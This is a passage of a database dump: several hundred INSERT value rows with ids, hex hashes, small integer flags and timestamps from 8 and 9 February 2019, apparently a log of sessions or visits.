(57205, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-08 22:37:41'),
(57206, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-08 22:37:42'),
(57207, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-08 22:37:48'),
(57208, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-08 22:37:50'),
(57209, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-08 22:37:54'),
(57210, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-08 22:38:10'),
(57211, 'ef7e7daa203e88bdec7d0fed016e0216', '1c68b977b911188c', 0, 2, 1, '2019-02-08 22:38:39'),
(57212, 'b35b19d920158c12b17a87d844574e90', '679c2311f97bf8cf', 0, 2, 1, '2019-02-08 22:38:46'),
(57213, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-08 22:40:16'),
(57214, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-08 22:40:26'),
(57215, 'f1fab0f07553b0949d861c04945ed428', '1c68b977b911188c', 0, 2, 1, '2019-02-08 22:40:44'),
(57216, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-08 22:40:50'),
(57217, 'fdaa1e47cef84ce3886b89eceef94cd6', '679c2311f97bf8cf', 0, 2, 1, '2019-02-08 22:41:14'),
(57218, 'fdaa1e47cef84ce3886b89eceef94cd6', '679c2311f97bf8cf', 0, 2, 1, '2019-02-08 22:41:39'),
(57219, '7f690d2b63c492861d57206469532957', '16dbd7825fa843c4', 0, 2, 1, '2019-02-08 22:45:13'),
(57220, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-08 22:47:28'),
(57221, '5190273cd66a409e746d8d787cd21e21', 'c82195f7827b9487', 0, 2, 1, '2019-02-08 22:52:28'),
(57222, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-08 22:54:47'),
(57223, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-08 22:54:57'),
(57224, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-08 22:54:57'),
(57225, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-08 22:55:13'),
(57226, '7f690d2b63c492861d57206469532957', '16dbd7825fa843c4', 0, 2, 1, '2019-02-08 22:55:20'),
(57227, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-08 22:55:20'),
(57228, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-08 22:55:24'),
(57229, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-08 22:55:28'),
(57230, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-08 22:55:39'),
(57231, '7f690d2b63c492861d57206469532957', '16dbd7825fa843c4', 0, 2, 1, '2019-02-08 23:07:15'),
(57232, '450915d1daa3b777b746616df5f0536d', 'dee0189c9a93ff94', 0, 2, 1, '2019-02-08 23:21:26'),
(57233, '450915d1daa3b777b746616df5f0536d', 'dee0189c9a93ff94', 0, 2, 1, '2019-02-08 23:23:27'),
(57234, '7d08c87f702b48a077e104a98386f620', '2f9874c2eaca87e0', 0, 2, 1, '2019-02-08 23:40:40'),
(57235, '199d1c595b11e2837e10a5a3699a442f', 'dace6e0c219330fc', 0, 2, 1, '2019-02-08 23:41:25'),
(57236, '7d08c87f702b48a077e104a98386f620', '2f9874c2eaca87e0', 0, 2, 1, '2019-02-08 23:42:29'),
(57237, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-08 23:45:07'),
(57238, '7d08c87f702b48a077e104a98386f620', '2f9874c2eaca87e0', 0, 2, 1, '2019-02-08 23:45:20'),
(57239, '7d08c87f702b48a077e104a98386f620', '2f9874c2eaca87e0', 0, 2, 1, '2019-02-08 23:47:49'),
(57240, 'c992edd6c1b6780771018da60d2978f8', 'da0989130d1f218b', 0, 2, 1, '2019-02-08 23:51:20'),
(57241, '9c332dd76604458aa2af2729b7f18f17', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-02-08 23:53:31'),
(57242, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-08 23:53:33'),
(57243, 'e4ee78ba3940ae3b0fb0f4cd79149f3d', '5fbd3d18c7771dec', 0, 2, 1, '2019-02-08 23:55:05'),
(57244, 'f85bf38fb8997eeb643d6f148a7e610f', '586664626216d986', 0, 2, 1, '2019-02-08 23:55:22'),
(57245, 'e4ee78ba3940ae3b0fb0f4cd79149f3d', '5fbd3d18c7771dec', 0, 2, 1, '2019-02-08 23:56:37'),
(57246, 'e4ee78ba3940ae3b0fb0f4cd79149f3d', '5fbd3d18c7771dec', 0, 2, 1, '2019-02-08 23:57:41'),
(57247, 'c30d69f86b8417fd3846f5a0323330a9', 'c9c005f22c683d32', 0, 2, 1, '2019-02-09 00:14:52'),
(57248, 'dddcd9ad0024726c30820404a24a0048', 'fc9298b8acd75db3', 0, 2, 1, '2019-02-09 00:15:15'),
(57249, '4010cf571b917a81a147f84e95b73a60', 'a8526f6e757f5fda', 0, 2, 1, '2019-02-09 00:21:56'),
(57250, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 00:22:36'),
(57251, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:23:05'),
(57252, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 00:23:06'),
(57253, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:23:37'),
(57254, '7f690d2b63c492861d57206469532957', '16dbd7825fa843c4', 0, 2, 1, '2019-02-09 00:23:38'),
(57255, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:23:50'),
(57256, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:24:40'),
(57257, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:24:45'),
(57258, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:24:50'),
(57259, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:25:42'),
(57260, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 00:25:49'),
(57261, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:26:07'),
(57262, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:26:41'),
(57263, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:26:53'),
(57264, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 00:27:27'),
(57265, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:27:42'),
(57266, 'f1fab0f07553b0949d861c04945ed428', '1c68b977b911188c', 0, 2, 1, '2019-02-09 00:27:54'),
(57267, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:28:08'),
(57268, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:28:17'),
(57269, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 00:28:19'),
(57270, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 00:28:20'),
(57271, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:28:45'),
(57272, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:28:50'),
(57273, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:29:00'),
(57274, 'f1fab0f07553b0949d861c04945ed428', '1c68b977b911188c', 0, 2, 1, '2019-02-09 00:29:21'),
(57275, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:29:26'),
(57276, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:30:01'),
(57277, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:30:13'),
(57278, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:30:16'),
(57279, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:30:19'),
(57280, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 00:30:26'),
(57281, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:30:41'),
(57282, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:30:51'),
(57283, 'dddcd9ad0024726c30820404a24a0048', 'fc9298b8acd75db3', 0, 2, 1, '2019-02-09 00:30:58'),
(57284, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:31:03'),
(57285, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:31:07'),
(57286, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:31:15'),
(57287, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:31:29'),
(57288, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:31:29'),
(57289, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:31:32'),
(57290, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:31:40'),
(57291, '9c332dd76604458aa2af2729b7f18f17', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-02-09 00:31:41'),
(57292, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:32:02'),
(57293, '9370518490a056acf04b6984e838899a', '29ef45db200a8f59', 0, 2, 1, '2019-02-09 00:32:07'),
(57294, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:32:15'),
(57295, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:32:16'),
(57296, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:32:27'),
(57297, '9370518490a056acf04b6984e838899a', '29ef45db200a8f59', 0, 2, 1, '2019-02-09 00:32:35'),
(57298, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:32:40'),
(57299, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:33:05'),
(57300, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:33:17'),
(57301, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 00:33:21'),
(57302, '2bcb540c373d4f0561d2b8cf5930ee03', 'd8923e60c6dca0dc', 0, 2, 1, '2019-02-09 00:33:41'),
(57303, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:33:43'),
(57304, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:33:44'),
(57305, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:33:56'),
(57306, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 00:34:02'),
(57307, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:34:12'),
(57308, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:34:27'),
(57309, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 00:34:28'),
(57310, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:34:39'),
(57311, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:34:43'),
(57312, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:34:49'),
(57313, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 00:34:49'),
(57314, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:34:50'),
(57315, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 00:34:51'),
(57316, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:35:01'),
(57317, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:35:05'),
(57318, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 00:35:12'),
(57319, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:35:28'),
(57320, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 00:35:34'),
(57321, '8d3c50b95a888461bc4cd400abc76373', 'c8e692bf76d23583', 0, 2, 1, '2019-02-09 00:35:36'),
(57322, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:35:46'),
(57323, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:35:47'),
(57324, '8d3c50b95a888461bc4cd400abc76373', 'c8e692bf76d23583', 0, 2, 1, '2019-02-09 00:35:51'),
(57325, 'e48f496059ec85c962fdfa707449a450', '37e74ecdea34d934', 0, 2, 1, '2019-02-09 00:35:54'),
(57326, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:35:59'),
(57327, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:36:01'),
(57328, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:36:12'),
(57329, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:36:16'),
(57330, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:36:19'),
(57331, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:36:31'),
(57332, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:36:38'),
(57333, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:37:00'),
(57334, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:37:10'),
(57335, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 00:37:21'),
(57336, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:37:24'),
(57337, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:37:26'),
(57338, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:37:33'),
(57339, 'bc84554639d50c8045a1b26f2d7730d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 00:37:43'),
(57340, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:37:48'),
(57341, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:37:51'),
(57342, '44b6dcbf552fad2e8acab898014081e7', 'b4ecb18ba7992a18', 0, 2, 1, '2019-02-09 00:38:09'),
(57343, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:38:15'),
(57344, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:38:29'),
(57345, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:38:37'),
(57346, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 00:38:38'),
(57347, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:38:43'),
(57348, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 00:38:45'),
(57349, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:38:52'),
(57350, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:38:55'),
(57351, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 00:38:56'),
(57352, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:38:58'),
(57353, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:39:02'),
(57354, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:39:03'),
(57355, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:39:18'),
(57356, '25d26b063cd3cfee423582b991a0f927', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 00:39:24'),
(57357, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:39:26'),
(57358, '185d69376f4e5609afc46e7cbe347740', '7078c9f75e6e3b78', 0, 2, 1, '2019-02-09 00:39:37'),
(57359, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:39:43'),
(57360, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:40:02'),
(57361, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:40:20'),
(57362, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:40:29'),
(57363, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 00:40:39'),
(57364, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:40:42'),
(57365, '832101422a765b14fbaf3b9b7abfec87', 'b453f7c003bf64ff', 0, 2, 1, '2019-02-09 00:46:08'),
(57366, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 00:46:59'),
(57367, '6a375f2e3777ffa4a49263d8182b4cb5', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 00:47:14'),
(57368, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:48:03'),
(57369, '9713811f24e1656fa320ce7389c22246', '8e0589df61cad931', 0, 2, 1, '2019-02-09 00:51:44'),
(57370, 'dd86144331aa53493fa1c955e64047d9', '06ba833b32e13d7d', 0, 2, 1, '2019-02-09 01:12:22'),
(57371, '5e9f1cce40718ceb9e27ea181c9368a8', 'db1b55aa7bb7987d', 0, 2, 1, '2019-02-09 01:27:30'),
(57372, '5e9f1cce40718ceb9e27ea181c9368a8', 'db1b55aa7bb7987d', 0, 2, 1, '2019-02-09 01:27:43'),
(57373, 'dd86144331aa53493fa1c955e64047d9', '06ba833b32e13d7d', 0, 2, 1, '2019-02-09 01:52:47'),
(57374, '4119f6919c077d3d9afcb937a94ac255', '57a3d4b8ea87b3d9', 0, 2, 1, '2019-02-09 01:57:59'),
(57375, 'caf81697014f5cc30a92f5ae61ddf810', 'f262383b9055c62c', 0, 2, 1, '2019-02-09 01:59:51'),
(57376, 'dd86144331aa53493fa1c955e64047d9', '06ba833b32e13d7d', 0, 2, 1, '2019-02-09 02:06:01'),
(57377, '7d08c87f702b48a077e104a98386f620', '2f9874c2eaca87e0', 0, 2, 1, '2019-02-09 02:06:14'),
(57378, '93179f28874c1aaefe069a282d49f662', 'b17720f2aceb7615', 0, 2, 1, '2019-02-09 02:07:23'),
(57379, 'dd86144331aa53493fa1c955e64047d9', '06ba833b32e13d7d', 0, 2, 1, '2019-02-09 02:12:16'),
(57380, 'b429a5c43163ae0dc3afad96e57c20a9', '64a658fbde059399', 0, 2, 1, '2019-02-09 02:18:52'),
(57381, 'dd86144331aa53493fa1c955e64047d9', '06ba833b32e13d7d', 0, 2, 1, '2019-02-09 02:21:30'),
(57382, 'dd86144331aa53493fa1c955e64047d9', '06ba833b32e13d7d', 0, 2, 1, '2019-02-09 02:22:21'),
(57383, 'f5156c467dfbedeaa1fca508097604aa', '4edbed57951470f1', 0, 2, 1, '2019-02-09 02:32:25'),
(57384, '817b02d5d7b7b1127db8eb1a48d15b1c', '1bfcf035fcd25d5a', 0, 2, 1, '2019-02-09 03:04:47'),
(57385, '817b02d5d7b7b1127db8eb1a48d15b1c', '1bfcf035fcd25d5a', 0, 2, 1, '2019-02-09 03:07:09'),
(57386, '3cb5e1042549ee65aa975067c9cc799c', '4f2088a2b7e7d434', 0, 2, 1, '2019-02-09 03:39:47'),
(57387, 'd1dd42722ac3c4ccac41469b1310d04e', '7501cef3123ed231', 0, 2, 1, '2019-02-09 04:04:28'),
(57388, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-02-09 04:08:31'),
(57389, 'd9eff15652f78d31461c27f92f4b3599', 'a56e4f53fb618665', 0, 2, 1, '2019-02-09 04:31:59'),
(57390, '3645960f2b144d5fe920b9453f94f59d', '57a3d4b8ea87b3d9', 0, 2, 1, '2019-02-09 04:36:26'),
(57391, '335ffd539067b319edad310103d50c59', 'a639f655bef0fc87', 0, 2, 1, '2019-02-09 05:00:30'),
(57392, '5a74105b71d6f23178149589a97c9894', '93b498e4650068ea', 0, 2, 1, '2019-02-09 05:21:43'),
(57393, '196731909d5c8fe583a20ea933c31e7b', '437b5385bfd5f741', 0, 2, 1, '2019-02-09 05:26:09'),
(57394, '335ffd539067b319edad310103d50c59', 'a639f655bef0fc87', 0, 2, 1, '2019-02-09 05:32:56'),
(57395, 'dd0d4a970a2e24317c681145dfba866f', 'ead365992b655192', 0, 2, 1, '2019-02-09 06:05:50'),
(57396, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 06:10:03'),
(57397, '29dce4bbb73c7c1fb75cad537ba53138', '1b21fa3260656d2f', 0, 2, 1, '2019-02-09 06:12:33'),
(57398, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 06:17:33'),
(57399, '335ffd539067b319edad310103d50c59', 'a639f655bef0fc87', 0, 2, 1, '2019-02-09 06:25:05'),
(57400, 'ad7903df109e8faf50c12e71394fca9c', '3bd62a623f1a491c', 0, 2, 1, '2019-02-09 06:48:11'),
(57401, '335ffd539067b319edad310103d50c59', 'a639f655bef0fc87', 0, 2, 1, '2019-02-09 07:04:56'),
(57402, '97e8b7545f3e2cd2a9445a3a6d101e82', 'a2b92167f54c9dc2', 0, 2, 1, '2019-02-09 07:09:17'),
(57403, '40fd3fd613fa7c115267a86fe27aaa29', 'a2526146480c1ae4', 0, 2, 1, '2019-02-09 07:16:29'),
(57404, '6d7a724597290d35d58df433aecdfee4', '535dc425a26780ec', 0, 2, 1, '2019-02-09 07:28:14'),
(57405, 'f94be94de25e0c28d6a47de7144df7da', '0c7e404eb997bcb6', 0, 2, 1, '2019-02-09 07:36:45'),
(57406, 'f94be94de25e0c28d6a47de7144df7da', '0c7e404eb997bcb6', 0, 2, 1, '2019-02-09 07:37:52'),
(57407, '4010cf571b917a81a147f84e95b73a60', 'a8526f6e757f5fda', 0, 2, 1, '2019-02-09 07:49:37'),
(57408, 'c0fdd457bde7c1bc315f5e9bc08650b1', '5fd8810cbf2b927b', 0, 2, 1, '2019-02-09 08:16:24'),
(57409, '1bba22eb36023ac4cd6cf5b343d0fa2d', '16dbd7825fa843c4', 0, 2, 1, '2019-02-09 08:33:09'),
(57410, '1bba22eb36023ac4cd6cf5b343d0fa2d', '16dbd7825fa843c4', 0, 2, 1, '2019-02-09 08:34:10'),
(57411, '1bba22eb36023ac4cd6cf5b343d0fa2d', '16dbd7825fa843c4', 0, 2, 1, '2019-02-09 08:35:43'),
(57412, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 08:35:55'),
(57413, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 08:39:13'),
(57414, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 08:40:04'),
(57415, '6c5e15229974bfd58aca2ad028cf5ce5', '3de88ff4581dab27', 0, 2, 1, '2019-02-09 08:42:25'),
(57416, '6c5e15229974bfd58aca2ad028cf5ce5', '3de88ff4581dab27', 0, 2, 1, '2019-02-09 08:42:39'),
(57417, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 08:43:49'),
(57418, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 08:44:22'),
(57419, '776b70f163ab5eb1ee1bb015aa04fe10', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 08:44:35'),
(57420, '776b70f163ab5eb1ee1bb015aa04fe10', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 08:45:22'),
(57421, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 08:45:27'),
(57422, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 08:51:51'),
(57423, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 08:52:03'),
(57424, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 08:52:18'),
(57425, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 08:52:25'),
(57426, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 08:52:37'),
(57427, '1bba22eb36023ac4cd6cf5b343d0fa2d', '16dbd7825fa843c4', 0, 2, 1, '2019-02-09 08:52:57'),
(57428, '1bba22eb36023ac4cd6cf5b343d0fa2d', '16dbd7825fa843c4', 0, 2, 1, '2019-02-09 08:53:20'),
(57429, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 08:53:21'),
(57430, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 08:55:06'),
(57431, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 08:55:17'),
(57432, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 08:55:51'),
(57433, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 08:56:17'),
(57434, '3828f9ddb52fbc0a27e5bd07c4b4d4c8', '1b5a51f01e25f967', 0, 2, 1, '2019-02-09 08:58:01'),
(57435, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 08:59:46'),
